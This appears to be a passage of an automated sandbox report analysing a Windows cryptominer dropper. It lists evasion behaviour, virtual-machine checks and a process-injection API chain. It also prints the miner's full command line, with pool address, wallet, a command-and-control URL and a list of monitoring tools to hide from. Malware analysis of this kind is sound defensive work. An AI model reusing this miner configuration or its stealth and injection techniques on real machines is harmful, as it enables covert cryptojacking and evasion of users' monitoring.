          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\dialer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\System32\dialer.exeProcess information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          Source: C:\Windows\System32\dialer.exeCode function: OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,14_2_00000001400010C0
          Source: C:\Windows\System32\dialer.exeCode function: OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,42_2_00000001400010C0
          Source: C:\Windows\System32\dialer.exeSystem information queried: FirmwareTableInformation
          Source: dialer.exe, 0000002D.00000002.3378194513.0000021C6D1F4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXE
          Source: dialer.exe, 0000002D.00000002.3378194513.0000021C6D165000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DIALER.EXE--ALGO=RX/0--URL=POOL.SUPPORTXMR.COM:8080--USER=4335MEZGWWSMBW161UQP6WAQYXZTRVXWSBPKZPXTXXAH4MTOXXBIERHGBAB8XHDZAEMKWWVNP49WWK5RIBJ37AK2AZKAEKR--PASS=XC--CPU-MAX-THREADS-HINT=30--CINIT-WINRING=FTNVUQWJTDWB.SYS--CINIT-STEALTH-TARGETS=TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE--CINIT-API=HTTP://83.217.209.235/YZYZYZYZNZNNZNZXNCXZHZXCHZCXHCXZHZXCHZCXZXCJJKASDJKSAJKDSA/API/ENDPOINT.PHP--CINIT-VERSION=3.4.0--CINIT-IDLE-WAIT=15--CINIT-IDLE-CPU=80--CINIT-ID=LDNDHOAIFLKHPADL
          Source: dialer.exe, 0000002D.00000002.3378194513.0000021C6D1F4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXEC
          Source: dialer.exe, 0000002D.00000002.3378194513.0000021C6D165000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: --CINIT-STEALTH-TARGETS=TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE
          Source: dialer.exe, 0000002D.00000003.2147213918.0000021C6D181000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXEHTTP://83.217.209.235/YZYZYZYZNZNNZNZXNCXZHZXCHZCXHCXZHZXCHZCXZXCJJKASDJKSAJKDSA/API/ENDPOINT.PHPLDNDHOAIFLKHPADL
          Source: dialer.exe, 0000002D.00000003.2147213918.0000021C6D181000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 0000002D.00000002.3378194513.0000021C6D206000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 0000002D.00000002.3378194513.0000021C6D165000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE
          Source: dialer.exe, 0000002D.00000002.3378194513.0000021C6D165000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXEMN
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5991
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3829
          Source: C:\Windows\System32\winlogon.exeWindow / User API: threadDelayed 8510
          Source: C:\Windows\System32\winlogon.exeWindow / User API: threadDelayed 1488
          Source: C:\Windows\System32\lsass.exeWindow / User API: threadDelayed 9928
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7178
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2346
          Source: C:\Windows\System32\dwm.exeWindow / User API: threadDelayed 9874
          Source: C:\Windows\System32\dialer.exeWindow / User API: threadDelayed 1803
          Source: C:\ProgramData\IGaming\driver.exeDropped PE file which has not been started: C:\Windows\Temp\ftnvuqwjtdwb.sys
          Source: C:\Windows\System32\lsass.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_27-14949
          Source: C:\Windows\System32\svchost.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_30-14927
          Source: C:\Windows\System32\dialer.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_14-480
          Source: C:\Users\user\Desktop\file.exeAPI coverage: 3.1 %
          Source: C:\ProgramData\IGaming\driver.exeAPI coverage: 3.1 %
          Source: C:\Windows\System32\lsass.exeAPI coverage: 6.6 %
          Source: C:\Windows\System32\svchost.exeAPI coverage: 5.1 %
          Source: C:\Windows\System32\dialer.exeAPI coverage: 0.9 %
          Source: C:\Windows\System32\svchost.exeAPI coverage: 4.8 %
          Source: C:\Windows\System32\svchost.exeAPI coverage: 5.1 %
          Source: C:\Windows\System32\svchost.exeAPI coverage: 5.1 %
          Source: C:\Windows\System32\svchost.exeAPI coverage: 7.1 %
          Source: C:\Windows\System32\svchost.exeAPI coverage: 4.7 %
          Source: C:\Windows\System32\svchost.exeAPI coverage: 4.8 %
          Source: C:\Windows\System32\svchost.exeAPI coverage: 7.2 %
          Source: C:\Windows\System32\svchost.exeAPI coverage: 6.1 %
          Source: C:\Windows\System32\svchost.exeAPI coverage: 5.1 %
          Source: C:\Windows\System32\svchost.exeAPI coverage: 5.1 %
          Source: C:\Windows\System32\svchost.exeAPI coverage: 5.1 %
          Source: C:\Windows\System32\svchost.exeAPI coverage: 5.1 %
          Source: C:\Windows\System32\svchost.exeAPI coverage: 6.1 %
          Source: C:\Windows\System32\svchost.exeAPI coverage: 5.1 %
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2504Thread sleep count: 5991 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1960Thread sleep count: 3829 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5384Thread sleep time: -8301034833169293s >= -30000s
          Source: C:\Windows\System32\winlogon.exe TID: 3292Thread sleep count: 8510 > 30
          Source: C:\Windows\System32\winlogon.exe TID: 3292Thread sleep time: -8510000s >= -30000s
          Source: C:\Windows\System32\winlogon.exe TID: 3292Thread sleep count: 1488 > 30
          Source: C:\Windows\System32\winlogon.exe TID: 3292Thread sleep time: -1488000s >= -30000s
          Source: C:\Windows\System32\lsass.exe TID: 6220Thread sleep count: 9928 > 30
          Source: C:\Windows\System32\lsass.exe TID: 6220Thread sleep time: -9928000s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2884Thread sleep count: 7178 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6448Thread sleep count: 2346 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2680Thread sleep time: -6456360425798339s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 5616Thread sleep count: 247 > 30
          Source: C:\Windows\System32\svchost.exe TID: 5616Thread sleep time: -247000s >= -30000s
          Source: C:\Windows\System32\dwm.exe TID: 2944Thread sleep count: 9874 > 30
          Source: C:\Windows\System32\dwm.exe TID: 2944Thread sleep time: -9874000s >= -30000s
          Source: C:\Windows\System32\dialer.exe TID: 6132Thread sleep count: 1803 > 30
          Source: C:\Windows\System32\dialer.exe TID: 6132Thread sleep time: -180300s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 1976Thread sleep count: 254 > 30
          Source: C:\Windows\System32\svchost.exe TID: 1976Thread sleep time: -254000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 432Thread sleep count: 255 > 30
          Source: C:\Windows\System32\svchost.exe TID: 432Thread sleep time: -255000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 4068Thread sleep count: 255 > 30
          Source: C:\Windows\System32\svchost.exe TID: 4068Thread sleep time: -255000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 2608Thread sleep count: 254 > 30
          Source: C:\Windows\System32\svchost.exe TID: 2608Thread sleep time: -254000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 6480Thread sleep count: 201 > 30
          Source: C:\Windows\System32\svchost.exe TID: 6480Thread sleep time: -201000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 2752Thread sleep count: 254 > 30
          Source: C:\Windows\System32\svchost.exe TID: 2752Thread sleep time: -254000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 1412Thread sleep count: 239 > 30
          Source: C:\Windows\System32\svchost.exe TID: 1412Thread sleep time: -239000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 6432Thread sleep count: 248 > 30
          Source: C:\Windows\System32\svchost.exe TID: 6432Thread sleep time: -248000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 6048Thread sleep count: 241 > 30
          Source: C:\Windows\System32\svchost.exe TID: 6048Thread sleep time: -241000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 1960Thread sleep count: 255 > 30
          Source: C:\Windows\System32\svchost.exe TID: 1960Thread sleep time: -255000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 5588Thread sleep count: 236 > 30
          Source: C:\Windows\System32\svchost.exe TID: 5588Thread sleep time: -236000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 3920Thread sleep count: 254 > 30
          Source: C:\Windows\System32\svchost.exe TID: 3920Thread sleep time: -254000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 5812Thread sleep count: 255 > 30
          Source: C:\Windows\System32\svchost.exe TID: 5812Thread sleep time: -255000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 2716Thread sleep count: 254 > 30
          Source: C:\Windows\System32\svchost.exe TID: 2716Thread sleep time: -254000s >= -30000s
          Source: C:\Windows\System32\dialer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
          Source: C:\Windows\System32\dialer.exeLast function: Thread delayed
          Source: C:\Windows\System32\dialer.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\lsass.exeLast function: Thread delayed
          Source: C:\Windows\System32\lsass.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\dwm.exeLast function: Thread delayed
          Source: C:\Windows\System32\dwm.exeLast function: Thread delayed
          Source: C:\Windows\System32\dialer.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\winlogon.exeCode function: 21_2_000001E85898DCE0 FindFirstFileExW,21_2_000001E85898DCE0
          Source: C:\Windows\System32\lsass.exeCode function: 27_2_00000140AE86DCE0 FindFirstFileExW,27_2_00000140AE86DCE0
          Source: C:\Windows\System32\svchost.exeCode function: 30_2_00000195DD5CDCE0 FindFirstFileExW,30_2_00000195DD5CDCE0
          Source: C:\Windows\System32\dwm.exeCode function: 31_2_000001160CA1DCE0 FindFirstFileExW,31_2_000001160CA1DCE0
          Source: C:\Windows\System32\svchost.exeCode function: 46_2_00000257E10ADCE0 FindFirstFileExW,46_2_00000257E10ADCE0
          Source: C:\Windows\System32\svchost.exeCode function: 47_2_000001F28C93DCE0 FindFirstFileExW,47_2_000001F28C93DCE0
          Source: C:\Windows\System32\svchost.exeCode function: 48_2_000001CA9854DCE0 FindFirstFileExW,48_2_000001CA9854DCE0
          Source: C:\Windows\System32\svchost.exeCode function: 49_2_000001D26531DCE0 FindFirstFileExW,49_2_000001D26531DCE0
          Source: C:\Windows\System32\svchost.exeCode function: 50_2_00000254A27DDCE0 FindFirstFileExW,50_2_00000254A27DDCE0
          Source: C:\Windows\System32\svchost.exeCode function: 51_2_0000024B87DDDCE0 FindFirstFileExW,51_2_0000024B87DDDCE0
          Source: C:\Windows\System32\svchost.exeCode function: 52_2_00000205FD40DCE0 FindFirstFileExW,52_2_00000205FD40DCE0
          Source: C:\Windows\System32\svchost.exeCode function: 53_2_000001A2056ADCE0 FindFirstFileExW,53_2_000001A2056ADCE0
          Source: C:\Windows\System32\svchost.exeCode function: 54_2_0000018EC1F6DCE0 FindFirstFileExW,54_2_0000018EC1F6DCE0
          Source: C:\Windows\System32\svchost.exeCode function: 55_2_0000025CE3E0DCE0 FindFirstFileExW,55_2_0000025CE3E0DCE0
          Source: C:\Windows\System32\svchost.exeCode function: 56_2_000002623898DCE0 FindFirstFileExW,56_2_000002623898DCE0
          Source: C:\Windows\System32\svchost.exeCode function: 57_2_000002786E59DCE0 FindFirstFileExW,57_2_000002786E59DCE0
          Source: C:\Windows\System32\svchost.exeCode function: 58_2_000001611FFADCE0 FindFirstFileExW,58_2_000001611FFADCE0
          Source: C:\Windows\System32\svchost.exeCode function: 59_2_0000027C0F38DCE0 FindFirstFileExW,59_2_0000027C0F38DCE0
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: Microsoft-Windows-Storsvc%4Diagnostic.evtx.52.drBinary or memory string: VMware Virtual disk 2.0 6000c292b65879ff477a6af604113f58PCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218E0F40&0&00NTFS
          Source: Microsoft-Windows-Partition%4Diagnostic.evtx.52.drBinary or memory string: VMwareVirtual disk2.06000c292b65879ff477a6af604113f58PCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 0PCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218e0f40&0&00
          Source: svchost.exe, 00000034.00000000.2178476361.00000205FAC2B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.3376207799.00000205FAC2B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: @Microsoft-Windows-Hyper-V-Hypervisor
          Source: lsass.exe, 0000001B.00000000.2122141328.00000140AD88B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicvssNT SERVICE
          Source: svchost.exe, 00000034.00000000.2178508976.00000205FAC43000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: (@vmci
          Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.52.drBinary or memory string: VMware SATA CD00
          Source: svchost.exe, 00000032.00000002.3392383683.00000254A2FDA000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: zSCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000_0r
          Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.52.drBinary or memory string: NECVMWarVMware SATA CD00
          Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.52.drBinary or memory string: LSI_SASVMware Virtual disk 6000c2942fce4d06663969f532e45d1a
          Source: dialer.exe, 0000002D.00000002.3378194513.0000021C6D180000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: svchost.exe, 00000034.00000000.2183063878.00000205FBA00000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1a8
          Source: dwm.exe, 0000001F.00000002.3403437969.0000011607ED0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: PointVMware&P
          Source: dwm.exe, 0000001F.00000002.3403437969.0000011607ED0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000=
